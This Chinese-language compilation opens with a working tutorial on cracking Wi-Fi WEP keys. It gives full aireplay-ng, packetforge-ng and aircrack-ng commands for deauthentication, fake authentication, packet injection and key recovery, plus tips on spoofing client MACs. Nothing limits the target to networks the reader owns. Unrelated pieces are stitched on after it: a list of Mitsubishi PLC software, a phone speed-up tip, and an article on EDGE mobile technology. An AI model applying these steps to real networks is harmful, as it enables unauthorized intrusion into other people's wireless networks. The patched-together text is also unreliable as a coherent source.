Aireplay-ng 的 6 种攻击模式详解

-0    Deautenticate 冲突模式  
使已经连接的合法客户端强制断开与路由端的连接，使其重新连接。在重新连接过程中获得验证数据包，
从而产生有效 ARP request。 如果一个客户端连在路由端上，但是没有人上网以产生有效数据，此时，
即使用-3  也无法产生有效 ARP request。所以此时需要用-0  攻击模式配合，-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0  
参数说明：
【-0】：冲突攻击模式，后面跟发送次数（设置为 0，则为循环攻击，不停的断开连接，客户端无法正常上网）
【-a】：设置 ap 的 mac
【-c】：设置已连接的合法客户端的 mac。如果不设置-c，则断开所有和 ap 连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注：使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count  伪装客户端连接
这种模式是伪装一个客户端和 AP 进行连接。
这步是无客户端的研究学习的第一步，因为是无合法连接的客户端，因此需要一个伪装客户端来和路由器相连。
为让 AP 接受数据包，必须使自己的网卡和 AP 关联。如果没有关联的话，目标 AP 将忽略所有从你网卡发
送的数据包，IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令，让路由器接受到注
入命令后才可反馈数据从而产生 ARP 包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明：
【-1】：伪装客户端连接模式，后面跟延时
【-e】：设置 ap 的 essid
【-a】：设置 ap 的 mac
【-h】：设置伪装客户端的网卡 MAC（即自己网卡 mac）

-2 Interactive 交互模式  
这种攻击模式是一个抓包和提数据发攻击包，三种集合一起的模式
1．这种模式主要用于研究学习无客户端，先用-1 建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明：
【-2】：交互攻击模式
【-p】：设置控制帧中包含的信息（16 进制），默认采用 0841
【-c】：设置目标 mac 地址
【-b】：设置 ap 的 mac 地址
【-h】：设置伪装客户端的网卡 MAC（即自己网卡 mac）
2．提取包，发送注入数据包
aireplay-ng -2  –r <file> -x 1024 wifi0  
发包攻击.其中，-x 1024  是限定发包速度，避免网卡死机，可以选择 1024。
                                                                                                                            
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程
这种攻击模式很有效。既可以利用合法客户端，也可以配合-1  利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟，让合法客户端和 ap 之间通信，少量数据就可产生有效 ARP  request 才可利用-3
模式注入成功。如果没有任何通信存在，不能得到 ARP request.，则这种攻击就会失败。如果合法客户端和
ap 之间长时间内没有 ARP request，可以尝试同时使用-0  攻击。
如果没有合法客户端，则可以利用-1  建立虚拟连接的伪装客户端，连接过程中获得验证数据包，从而产生
有效 ARP request。再通过-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明：
【-3】：arp 注入攻击模式
【-b】：设置 ap 的 mac
【-h】：设置
【-x】：定义每秒发送数据户包的数量，但是最高不超过 1024，建议使用 512（也可不定义）

-4 Chopchop 攻击模式，用以获得一个包含密钥数据的 xor 文件
这种模式主要是获得一个可利用包含密钥数据的 xor  文件，不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0    
参数说明：
【-b】：设置需要研究学习的 AP 的 mac
【-h】：设置虚拟伪装连接的 mac（即自己网卡的 mac）

-5 fragment 碎片包攻击模式  用以获得 PRGA(包含密钥的后缀为 xor 的文件)
这种模式主要是获得一个可利用 PRGA，这里的 PRGA 并不是 wep  key 数据，不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包，当 AP 重广播
时，一个新的 IVS 将产生，我们就是利用这个来研究学习
aireplay-ng    -5 -b <ap mac> -h <my mac> wifi0    
【-5】：碎片包攻击模式
【-b】：设置 ap 的 mac
【-h】：设置虚拟伪装连接的 mac（即自己网卡的 mac）
Packetforge-ng：数据包制造程序
Packetforge-ng <mode> <options>
Mode
【-0】：伪造 ARP 包
packetforge-ng  -0  -a  <ap  mac>  -h  <my  mac>  wifi0  –k  255.255.255.255  -l  255.255.255.255
–y<.xor file> -w mrarp 参数说明：
【-0】：伪装 arp 数据包
【-a】：设置 ap 的 mac
【-h】设置虚拟伪装连接的 mac（即自己的 mac）
【-k】<ip[:port]>说明：设置目标文件 IP 和端口
【-l】<ip[:port]>说明：设置源文件 IP 和端口
【-y】<file>说明：从 xor 文件中读取 PRGA。后面跟 xor 的文件名。
【-w】设置伪装的 arp 包的文件名

Aircrack-ng：WEP  及  WPA-PSK key  研究学习主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
参数说明：
【-n】：设置 WEP KEY  长度（64/128/152/256/512）
aircrack-ng -x -f 2 name-01h.cap
参数说明：
【-x】：设置为暴力研究学习模式
【-f】：设置复杂程度，wep 密码设置为 1，wpa 密码设置为 2  
aircrack-ng -w password.txt ciw.cap
【-w】：设置为字典研究学习模式，后面跟字典文件，再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。

首先
到这个地方确认你的电脑无线网卡可以抓包，目前市上最好的设备就是无线卡王了，功率超强。
然后开始下载你需要的BT3版本：
如果随便玩玩，或者是台式机，可以下载CD版的那个，因为启动一次时间不短。
如果是笔记本，硬盘又大，可以下载 USB版的那个。

下载完以后，可以装到一个可以启动的U盘里面，或者直接保存到硬盘上，下面介绍如何用硬盘直接启动BT3 Backtrack 3 。

如何制作BT3启动盘

光盘版的，刻录完就好了，不提了。

USB版的， 随便解压缩到某个U盘的根目录，这样，根目录下有 BT3和Boot两个文件夹。
打开一个DOS窗口， 指向你的U盘目录，比如是H盘，那么
———运行———
H: +回车
cd boot
bootinst.bat

按提示，确认你的确是在你的U盘的目录下操作。然后OK了。

重启时插入U盘即可启动，如果有任何问题，请确认你的电脑打开了U盘启动，并且被放在第一启动项（ThinkPad可以指定排除某个启动项的，请检查）
或者在启动时按住F12， 选择 U盘启动。

如果是硬盘启动，虽然有很多办法，但是为了VISTA和XP的兼容，个人推荐 DOS启动法，即先弄一个DOS的启动，比如弄一个MouseDOS一类的，傻瓜安装，可以让电脑启动进入纯DOS状态，然后在DOS情况下，进入硬盘上解压出的那个Boot目录里面，里面有个DOS 目录，然后执行BT3.bat 即可。
建议在执行BT3.bat前，先运行一下 Smartdrv.exe ,可以加快启动速度很多。（附件里有 Smartdrv.exe 98版）
小提示：DOS下的启动，不会自动进入图形界面，可以通过编辑 DOS目录里面的 CONFIG文件来实现：
只需要在CONFIG里面，最后加上一句：
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的 Autoexec.bat文件，直接加上：
smartdrv.exe
D:
cd boot
cd dos
bt3.bat

这样启动直接进入了图形界面。
这时候的BT3，是全部在内存里的，也就是说，在系统内，任何对桌面和配置的改动都不会被记录，所以如果要记录文档，请不要放在桌面上。

使用BT3破解WEP密码过程

以下是破解过程
WEP 破解步骤
1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng –ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
aircrack-ng -n 64 -b ap_mac name-01.ivs

以下是破解命令的解释：（运行这些命令都需要打开终端窗口，可以使用Ctrl+C 从文本文件Copy， 然后 Shift+Insert 粘贴入终端窗口）
1）ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。

2) airmon-ng start wifi0 6
这个命令用于将自己的无线网卡置于Monitor 模式，即类似一个AP的效果，因此可以有抓别人包的功能。
其中 wifi0 是我电脑里面给无线网卡的 ，一般应该都是这个，第一个ifconfig -a命令可以看得到。
wifi0 后面的那个6 ，是需要破解的AP的频道，如果不知道，可以在事前左下角开始菜单里面，找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具，用它可以看到那些需要破解的AP的频道（Channel）。

运行命令成功以后，你会看到返回的提示显示出现一个 Ath1（如果你是 Athoes的无线网卡的话就是这个，其他的可能不同，不过一般都是XXX1这样）
这个就是你的用于破解的网卡代号

这个命令，简而言之，就是把你的无线网卡置于监控模式，并且指定监控的频道。
如果你发现弄错了频道，那么没关系，重新运行一遍就可以了，不过这个时候，可能就会变成 Ath2…Ath3 等等，但是好像最多运行三次，然后就会失败。

3) airodump-ng –ivs -w name -c 6 ath1
这个命令比较关键，你运行以后，就会列出所有该频道的AP。

其中，6 是指你需要监控的频道，必须和第二个命令里的一样， ath1是刚才第二步出现的别名。
这个命令运行以后，显示的内容比较多，简单介绍一下：
BSSID : 其实就是AP的Mac 地址
PWR： AP信号的大小，一般，低于10，就比较麻烦了，丢包情况严重，比较难破解
RXQ： 干扰的大小
Beacons：发送接受的包，参考信息，在跳说明有数据
#Data： 这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。
CH：频道
MB：网络连接速度 54就是54MB
ENC， CIPHER，AUTH
这些是加密方式，我们这次只讨论显示为 WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。
ESSID： 这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID

过一会儿，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。

这个窗口就开着好了，不用关闭，以后的命令，需要重新打开一个终端窗口操作。

4）aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
这一步开始，我们要做一些真正的破解工作，主要是针对那些客户端仅仅连接，没什么流量的AP，这种AP，#Data的增长非常慢，往往需要很长的时间才有可能取得足够的包（一般5位的密码需要10000个包左右，更多的密码就要更多的。。。。）这个时候就需要 aireplay-ng 出面了，顾名思义，这个软件就是 Replay，也就是说，模拟发包。

首先解释命令：
-e ap_essid 就是 -e 之后加上你需要破解的essid ，比如 TP-LINK ， linksys 啥的，注意大小写。
-a ap_mac 就是 -a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。不需要 ：哦。
-h XXXXXXXXXX 就是 -h 之后，加上你的无线网卡的 Mac地址， 在第一步你可以得到。
ath1 ，上面解释过了。
一个样板例子：
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1

这里有个小的建议，大家可以把以上的命令，都记录在一个文件里，然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉，这样就不需要每次都输入自己的Mac地址了。每次都可以用Copy Paste的方式来输入，这样可以有效防止什么1 和 l ， O和0 的混淆。

这一条命令，是用欺骗的方式，连接上那个AP，因此，如果网络信号不好，可能会执行不成功。
如果成功了，那么会显示Successful :> 字样。否则，请让信号强度大于10。

5）aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
上一条成功以后，我们需要开始收集那些需要的数据包，才能够进行模拟，并且破解。
所谓的需要的数据包，就是 #Data的数据，如果 #Data一直是0，那么可能会很麻烦，最好的情况是 #Data缓慢增长的这种情况。

解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址，从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX 就是你自己网卡的Mac地址。
Ath1 和上面一样

这一条命令的执行，和#data包有关，如果#Data 没有增加，则这个命令会一直执行，直到捕获一个#Data包。
捕获以后，程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功，则会显示成功，失败往往是因为信号太差造成的， 如果攻击失败（往往是捕获的包有问题），程序重试N次以后，或自动重新开始捕捉包，继续进行即可。

等成功完成以后，会显示一个文件名：fragment-XXXXX-XXXXXX.xor
这个文件名，XXXXX里面是数字，是一个文件。马上会用得到。

这一步是最有可能失败的一步，尽量保持信号好一点。

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

第六步，参数比较多，解释一下：
-a ap_mac 是待破解的AP的Mac地址，
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor 就是第五步显示的那个文件名。
这一步会很快做完， 显示生成文件到 mrarp啥的，其实就是破解包的准备过程。

7) aireplay-ng -2 -r mrarp -x 1024 ath1
这一步没哈可以修改的，参数解释一下
ath1 是 你的无线网卡的名字
1024 是攻击速度，1024是最大值了，如果你的无线网卡不是MiniPCI的，个人建议设为 512 ，这样不容易死机。

当这一步开始执行，你会看到 第一个终端窗口里面，你破解的那个AP后面的 #Data在飞速增长，一般是 200个/s的速度，我们只需等待即可

8）我们可以新打开一个终端窗口，当 #Data达到 10000个的时候，就可以测试破解了，很多密码都可以 10000左右#Data就算出来
新窗口中运行：
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下，
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件， 如果你多次运行了第三步，那么，可能会生成多个 name-XX.ivs文件， 你可以到对应的文件夹里看一下（就在桌面上的第一个文件夹图标里），找到XX最大的那个，就是你当前正在使用的这个文件。

运行以后，如果运气好，一会儿就会显示破解出来的密码，同时会显示 对应的Assic码，如果不是标准Assic码，就是一串数字，记录下来，搞掂。
运气不好的情况，这个程序会继续等待更多的#Data，等到了，就会重新计算一次密码。

小结一下：
本教程只针对 WEP 密码的破解教材，最好有得到认证的客户端连接在这个AP上，如果没有，有些AP（比如TP-LINK）能够被破解，某些可能就无法破解。联入网络以后，你可以管理他的AP，进行一些优化，往往AP的密码，可能就是WEP的密码。

FXGP-WIN-C:
三菱FX系列PLC编程软件(不含FX3U),支持梯形图、指令表、SFC语言编程,可进行程序的在线更改、监控及调试，具有异地读写PLC程序功能。

GX Developer:
三菱全系列PLC编程软件,支持梯形图、指令表、SFC、ST及FB、Label语言编程，网络参数设定，可进行程序的在线更改、监控及调试，结构化程序的编写(分部编程)，可制作成标准化程序, 在其它同类系统中使用。

GX Simulator:
三菱PLC的仿真调试软件，支持三菱所有型号PLC(FX,AnU,QnA和Q系列)，模拟外部I/O信号，设定软件状态与数值。

GX Explorer:
三菱全系列PLC维护工具,提供PLC维护必要的功能。类Windows操作，通过拖动进行程序的上传/下载，可以同时打开几个窗口监控多CPU系统的数据，配合GX RemoteService-I 使用因特网维护功能.

GX RemoteService I :
三菱全系列PLC远程访问工具，安装在服务器上，通过因特网/局域网连接PLC和客户。将PLC的状态发EMAIL给手机或计算机，可以通过因特网浏览器对软元件进行监控/测试。在客户机上，可使用GX Explorer软件通过因特网/局域网进入PLC。

GX Configurator-CC:
A系列专用，cclink单元的设定，监控工具。用于A 系列CC-Link主站模块的CC-Link网络参数设定,无需再编制顺控程序来设定参数，在软件图形输入屏幕中简单设定。可以监控, 测试和诊断CC-Link 站的状态 (主站/其它站) ，可以设置 AJ65BT-R2的缓存寄存器

GX Configurator-AD:
Q系列专用，A/D转换单元的设定，监控工具。用于设置Q64AD、Q68ADV 和Q68ADI模数转换模块的初始化数据和自动刷新数据，不用编制顺控程序即可实现A/D模块的初始化功能。

GX Configurator-DA:
Q系列专用，D/A转换单元的设定，监控工具。用于设置Q62DA、Q64DA、 Q68DAV和Q68DAI 数模转换模块的初始化及自动刷新数据。不用编制顺控程序即可实现D/A模块的初始化功能。

GX Configurator-SC:
Q系列专用，串行通信单元的设定，监控工具。用于设置串行通信模块QJ71C24(N)、QJ71C24(N)-R2(R4)的条件数据。不用顺控程序即可实现1.传送控制，2.MC 协议通讯，3.无协议通讯，4.交互协议通讯，5.PLC 监视功能，6.调制解调器设置参数设定。

GX Configurator-CT:
Q系列专用，高速计数器单元的设定，监控工具。用于设置QD62 、QD62E 或QD62D 高速计数模块的初始化数据和自动刷新数据，不用编制顺控程序即可实现初始化功能。

GX Configurator-PT:
Q系列专用，QD70单元的设定，监控工具。用来设定QD70P4 或QD70P8 定位模块的初始化数据。省去了用于初始化数据设定的顺控程序，便于检查设置状态和运行状态。

GX Configurator-QP:
Q系列专用，QD75P/DM用定位单元设定，监控工具。可对QD75□□进行各种参数、定位数据设置、监视控制状态并执行运行测试。进行（离线）预设定位数据基础上的模拟和对调试和维护有用的监视功能，即以时序图形式表示定位模块I/O信号、外部I/O信号和缓冲存储器状态的采样监视。

GX Configurator-TI:
Q系列专用，温度输入器单元的设定，监控工具。用于设置Q64TD 或Q64RD 温度输入模块的初始化数据和自动刷新数据，不用编制顺控程序即可实现初始化功能。

GX Configurator-TC:
Q系列专用，温度调节器单元设定，监控工具。用于设置Q64TCTT、Q64TCTTBW、Q64TCRT 或Q64TCRTBW 温度控制模块的初始化数据和自动刷新数据。

GX Configurator-AS:
Q系列专用，AS-I主控单元的设定，监控工具。用于设置AS-i主模块QJ71AS92自动读出/写入的通信数据、CPU软元件存储的自动刷新设置、配置数据的注册/EEPROM保存等的软件工具。

GX Configurator-DP:
MELSEC-PLC系列专用，Profibus-DP模块的设定，监控工具。用于设置Profibus-DP主站模块QJ71PB92D和A(1S)J71PB92D网络参数（包括主站参数设定、总线参数设定、从站设定等）的软件工具。使用QJ71PB92D时可以实现自动刷新功能，可以通过网络在线远程登入模块。

GX Configurator-MB
MELSEC-PLC系列QJ71MB91,QJ71MT91等MODUBUS模块软件。

GX Converter:
GX Converter软件包用于将GX Developer的数据转换成Word或Excel 数据使文档的创建简单化。把Excel数据(CSV格式)或文本数据(TXT文件)用于GPPW，把GPPW程序表和软元件注释转换为Excel数据(CSV格式)或文本数据(TXT文件).

MX Component:
MX Component支持个人计算机与可编程控制器之间的所有通信路径，支持VisualC++ 、Visual Basic 和Access Excel 的VBA、 VBScript。不用考虑各种通信协议的不同，只要经简单处理即可实现通信。不用连接PLC，和GX Simulator同时使用，实现仿真调试。

MX Sheet:
MX Sheet是一种软件包，它使用Excel，不用编程，只要进行简单设置，即可运行可编程控制器系统的监视/记录/警报信息的采集/设置值的更改操作。将可编程控制器的软元件数据存储在Excel上，能够容易地收集和分析现场的质量、温度、试验结果等的数据。Excel上显示可编程控制器内的软元件实时状态。将可编程控制器内的位信息作为警报信息存储在Excel上，保存故障发生的历史记录。自动保存按照指定时刻或可编程控制器发出触发条件Excel上显示出来的数据，可用来实现日报和试验结果表的制作和存储的自动化。

MT Developer:
MT Developer SW6RNC-GSV是Q系列运动控制器CPU单元的设定，监控工具。例如Q173(2)CPU(N)运动控制器等。

MX OPC Server:
MX OPC Server使用简单，具有仿真功能，自带OPC客户端工具，可直接读写PLC数据.

PX DEVELOPER:
Q系列过程控制CPU编程软件

GT Converter2
是三菱触摸屏集成软件中的一个软件，其作用是可以将市面上使用较多的Pro-Face的程序转换成三菱触摸屏程序的一个软件,同时该软件也能将三菱以前老款的A800触摸屏的程序转换成现在新软件能识别的程序。

GX WORKS:
SWnD5C-QSET,三菱软件包的集合，包含了GX-Developer;Explorer;Config-AD/DA/SC/CT等。

1、功能表>办公工具>待办事项

主题:Speed
预定日期:2005-1-29
优先等级:高

2、功能表>办公工具>待办事项

主题: Qoukie
预定日期:2005-1-29
优先等级:低

原理分析： 由于手机需要将所有未完成的日历事务（即从1900年－2100年）调入内存，并在桌面上（主题情景）显示出来，用于提醒手机主人设定的某某未办事项、约会、纪念日等等待办事项的提醒。所以，程序会从2100年到1900年反向扫描，历遍200年的日历事务，这下能想得出来，这需要占用多少系统资源了吧？直到它扫描到有“已完成”的事务，后面的日期它就认为是已经过去的日期，不再继续扫描。所以，原文中的最后一步：一定要设为“已完成”才有效果。 因为这种机理，当扫描到上面设置的日期已经有“已完成”的待办事项时，它就不会再将该日期之前的待办事项显示在主题情景中了，百多年啊！所以节省了不少系统资源，机油们可以用进程管理软件查看对比一下，正确做过该方法设置的，可用内存空间会比原来未设置前多出许多。这也就是为什么这种方法能提速的原因了。

1、通信技术
　　
一、技术简述

　　　之所以称EDGE为GPRS到第三代移动通信的过渡性技术方案，主要原因是这种技术能够充分利用现有的GSM资源。因为它除了采用现有的GSM频率外，同时还利用了大部分现有的GSM设备，而只需对网络软件及硬件做一些较小的改动，就能 够使运营商向移动用户提供诸如互联网浏览、视频电话会议和高速电子邮件传输等无线多媒体服务，即在第三代移动网络商业化之前提前为用户提供个人多媒体通信 业务。由于EDGE是一种介于现有的第二代移动网络与第三代移动网络之间的过渡技术，比”二代半”技术GPRS更加优良，因此也有人称它为”2.75代”技术。EDGE还能够与以后的WCDMA 制式共存，这也正是其所具有的弹性优势。 EDGE技术主要影响现有GSM网络的无线访问部分，即收发基站(BTS)和GSM 中的基站控制器(BSC)，而对基于电路交换和分组交换的应用和接口并没有太大的影响。因此，网络运营商可最大限度地利用现有的无线网络设备，只需少量的 投资就可以部署EDGE，并且通过移动交换中心(MSC)和服务GPRS支持节点(SGSN)还可以保留使用现有的网络接口。事实上，EDGE改进了这些 现有GSM应用的性能和效率并且为将来的宽带服务提供了可能。-EDGE技术有效地提高了GPRS信道编码效率及其高速移动数据标准，它的最高速率可达 384kbit/s，在一定程度上节约了网络投资，可以充分满足未来无线多媒体应用的带宽需求。从长远观点看，它将会逐步取代GPRS成为与第三代移动通 信系统最接近的一项技术。
　　
二、技术定位

　　
　　GSM和TDMA/136现在是全球通用的第二代蜂窝移动通信标准。当前有100多个国家的1亿多人采用GSM，有近100个国家的约9500万用户采用TDMA/136系统家族（包括ELA-553和IS-54）服务。作为介于现有第二代移动通信系统与第三代移动通信系统之间的一种过渡性数据通信技术，EDGE(EnhancedDatarate for GSM Evolution)技术能够大大提高现有GSM网络的数据服务速率。但要想充分发挥EDGE的速率优势，运营商必须要对现有的GSM系统结构和所有设备进行修改。
　　EDGE的技术不同于GSM的优势在于： (1). 8 PSK空中接口模式 (2).增强型的AMR编码方式 (3).MCS1~9九种信道编码方式 (4).链路自适应 (5).递增冗余传输 (6).RLC窗口大小自动调整
　　
三、出现背景

　　语音通信是第二代移动系统的主要服务，最近几年，移动通信设备则在大大增强对数据通信的支持能力，一些标准的移动通信设备当前可以提供速率达9.6kbps的数据服务。但是这样低的数据通信速率显然无法满足移动设备多媒体数据通信的需求，因此，厂商们纷纷在开发新的、速率更快的移动数据通信技术，其中最典型的就是GPRS（通用分组无线服务）、HSCSD（高速率电路交换数据）和EDGE。
　　这三种技术都能够不同程度地解决更高数据速率的需求问题。HSCSD引进了多时隙的概念，HSCSD和GPRS技术都是一种面向非连接的技术，用户只有真正在收发数据时才需要保持对网络的连接，因此大大提高了无线资源的利用率。除此之外，许多新的核心网络组件产品将使未来的移动通信产品可以直接访问Internet/Intranet。
　　HSCSD和GPRS通过多时隙操作实现了较高的比特速率。但是因为这些技术是基于高斯最小移频键控（GMSK）调制技术的，因此每个时隙能够得到的速率提高是有限的。为此，许多效率更高的调制方案纷纷出台，例如在TDMA/136+中，多时隙操作和新的调制方案8PSK（基于30kHz的载波带宽）的结合将使数据率提高大约4倍。
　　第三代无线通信IMT-2000的优势主要在于能够使用宽带服务，大大改进目前在GSM和TDMA/136上提供的标准化服务。第三代移动通信系统将提供384kbps的广域数据通信服务和大约2Mbps的局域数据通信服务。新的用于码分多址访问（W-CDMA）的2GHz频段已经得到了ETSI、无线电工业与广播协会(ARIB)的支持。W-CDMA将包括IMT-2000设备所需要的所有功能。然而，向更高的数据率发展并不仅限于新的2GHz频段，EDGE技术也能够让使用800、900、1800、1900MHz频段的网络提供第三代移动通信网络的部分功能。
　　在此基础上，Ericsson公司于1997年第一次向ETSI提出了EDGE的概念。同年，ETSI批准了EDGE的可行性研究，这对以后EDGE的发展铺平了道路。尽管EDGE仍然使用了GSM载波带宽和时隙结构，但它也能够用于其他的蜂窝通信系统。EDGE可以被视为一个提供高比特率、并且因此促进蜂窝移动系统向第三代功能演进的、有效的通用无线接**术。在此基础上，统一无线通信论坛（UWCC）评估了用于TDMA/136的EDGE技术，并且于1998年1月批准了该技术。
　　在现有的GSM网络中引进EDGE技术必然会对现有的网络结构和移动通信设备带来影响。要使EDGE易于被网络运营商接受和推广，EDGE必须将它现有的网络结构的影响降到最低，并且EDGE系统应该允许运营商再次利用现有的基站设备。此外，使用EDGE，运营商应该不需要修改它们的无线网络规划，而且EDGE的引入也不能影响移动通信的质量。
　　EDGE主要影响网络的无线访问部分收发基站（BTS）、GSM中的基站控制器（BSC）以及TDMA中的基站（BS），但是对基于电路交换和分组交换访问的应用和接口并没有不良影响。通过移动交换中心（MSC）和服务GPRS支持节点（SGSN）可以保留使用现有的网络接口。事实上，EDGE改进了一些现有的GSM应用的性能和效率，为将来的宽带服务提供了可能。
　　
四、技术特点

　　EDGE是一种能够进一步提高移动数据业务传输速率和从GSM向3G过渡中的重要技术。它在接入业务和网络建设方面所具有以下特性：
　　1.在接入业务性能
　　(1)带宽得到明显提高,单点接入速率峰值为2Mbit/s，单时隙信道的速率可达到48kbit/s，从而使移动数据业务的传输速率在峰值可以达到384kbit/s，这为移动多媒体业务的实现提供了基础。
　　(2)更为精准的网络层提供位置服务。
　　2.网络建设方面的特点
　　　(1)EDGE是一种调制编码技术，它改变了空中接口的速率。
　　(2)EDGE的空中信道分配方式、TDMA的帧结构等空中接口特性与GSM相同。
　　(3)EDGE不改变GSM或GPRS网的结构，也不引入新的网络单元，只是对BTS进行升级。
　　(4)核心网络采用3层模型：业务应用层、通信控制层和通信连接层，各层之间的接口应是标准化的。采用层次化结构可以使呼叫控制与通信连接相对##，这可充分发挥分组交换网络的优势，使业务量与带宽分配更紧密，尤其适应VoIP业务。
　　(5)引入了媒体网关(MGW)。MGW具有STP功能，可以在IP网中实现信令网的组建(需VPN支持)。此外，MGW既是GSM的电路交换业务与PSTN的接口，也是无线接入网(RAN)与3G核心网的接口。
　　(6)EDGE的速率高,现有的GSM网络主要采用高斯最小移频键控(GMSK)调 制技术，而EDGE采用了八进制移相键控(8PSK)调制，在移动环境中可以稳定达到384kbit/s，在静止环境中甚至可以达到2Mbit/s,基本 上能够满足各种无线应用的需求。 (7)EDGE同时支持分组交换和电路交换两种数据传输方式。它支持的分组数据服务 可以实现每时隙高达11.2kbit/s-69.2kbit/s的速率。EDGE可以用28.8kbit/s的速率支持电路交换服务，它支持对称和非对称 两种数据传输，这对于移动设备上网是非常重要的。比如在EDGE系统中，用户可以在下行链路中采用比上行链路更高的速率。
　　3.无线接口概览
　　EDGE无线接口的主要作用是使当前的蜂窝通信系统可以获得更高的数据通信速率。现有的GSM网络主要采用GMSK调制技术，为以增加无线接口的总速率，在EDGE中引入了一个能够提供高数据率的调制方案，即八进制移相键控(8PSK)调制。由于8PSK将GMSK的信号空间从2扩展到8，因此每个符号可以包括的信息是原来的4倍。8PSK的符号率保持在271kbps，每个时隙可以得到69.2kbps的总速率，并且仍然能够完成GSM频谱屏蔽。
　　EDGE规范的基本指导思想是尽可能多地利用现有的GSM数据服务类型，大大提高其数据通信速率。它定义了几个信道编码方案来确保各种信道环境的鲁棒性，使用了链路自适应技术以实现编码和调制方案之间的动态转换。通过再次利用GPRS结构，分组数据服务可以实现每时隙高达11.2-69.2kbps的无线通信速率。EDGE通过使用一个高速每时隙28.8kbps的无线接口速率来支持电路交换服务。
　　在EDGE方案中，支持所有服务的多时隙通信得到的速率是单时隙通信的8倍，用于分组数据服务的峰值无线通信速率可高达554kbps。
　　(1)对无线接口设备的影响
　　EDGE对GSM网络原有无线接口的修改将直接影响基站和移动终端的设计，人们必须采用新的终端和基站收发机才能收发使用EDGE调制的信息。
　　(2)对线性调制的影响
　　新的调制方案对功率放大器的线性提出了新的要求。与GMSK不同的是，8PSK并不具有一个固定的封装。事实上，EDGE面临的最大挑战是创建一个成本经济的发射机，同时完成GSM的频谱屏蔽。
　　为了最大限度地利用现有的GSM网络，EDGE收发机必须装在一个为标准收发机设计的基站舱中，并且EDGE收发机必须在发射频谱和热分散方面可以被人们所接受。一般地，高性能的EDGE收发机在发射8PSK时可能需要减少它的平均发射功率，与GMSK相比，平均功率降低（SPD）在2-5dB之间。
　　如何设计低功率的收发机即微基站、室内或微微基站(picobase)和移动终端会带来进一步的挑战，比如在EDGE系统中就不能再使用针对非线性调制优化的发射机结构。
　　在连接移动终端的地方可以采取两种调制方式。第一种是将GMSK传输用于上行链路，将8PSK用于下行链路。这样上行链路的速率将限制在GPRS的范围内，而EDGE的高速率将提供给下行链路使用。因为绝大多数服务对下行链路的速率要求都要比上行链路高，这种方案可以用一种最经济的方式满足移动终端的服务需求。第二种方式就是在上行链路和下行链路中都采取决8PSK方式进行传输。
　　现有的GSM标准定义了多种移动终端，例如从具有低复杂性的单时隙设备到具有高比特性的8时隙设备等。
　　(3)对总速率的影响
　　接口总速率越高，技术就越复杂，EDGE接口的高速率无法通过最理想的均衡器结构来处理，而只能考虑次理想的均衡器设计。根据模拟测试的结果，用于8PSK的最好的均衡器设计将只比标准的GSM均衡器稍微复杂一点。
　　增强的比特率（与标准的GPRS相比）还减少了在时间分布和移动终端速率方面的鲁棒性。然而在绝大多数情况下，EDGE服务将被相对静止的用户使用，这意味着移动终端的高速移动和过度的时间分布是不可能的。另外，当移动速度和时间分布超出EDGE的能力时，还是需要使用GMSK调制的。
　　4.EDGE对网络结构的影响
　　无线数据通信速度的提高对现有GSM网络结构提出了新的要求。然而，EDGE系统对现有GSM核心网络的影响非常有限，并且由于GPRS节点、SGSN和网关GPRS支持节点（GGSN）或多或少地##于用户数据通信速率，因此EDGE将不需要部署新的硬件。
